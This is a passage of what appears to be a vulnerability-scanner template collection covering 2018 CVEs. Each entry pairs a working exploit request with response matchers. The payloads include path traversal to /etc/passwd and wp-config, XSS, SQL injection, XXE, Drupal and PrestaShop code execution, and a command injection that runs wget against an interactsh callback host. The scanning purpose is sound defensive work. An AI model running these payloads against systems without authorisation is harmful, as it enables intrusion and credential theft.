Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6605","info":{"name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+","matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(num)}}","dataexists"],"part":"body"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-8823","info":{"name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10737","info":{"name":"NagiosXI <= 5.4.12 logbook.php SQL injection","severity":"high"},"requests":[{"raw":["POST /nagiosql/admin/logbook.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10738","info":{"name":"NagiosXI <= 5.4.12 menuaccess.php - SQL injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/nagiosql/admin/menuaccess.php"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET 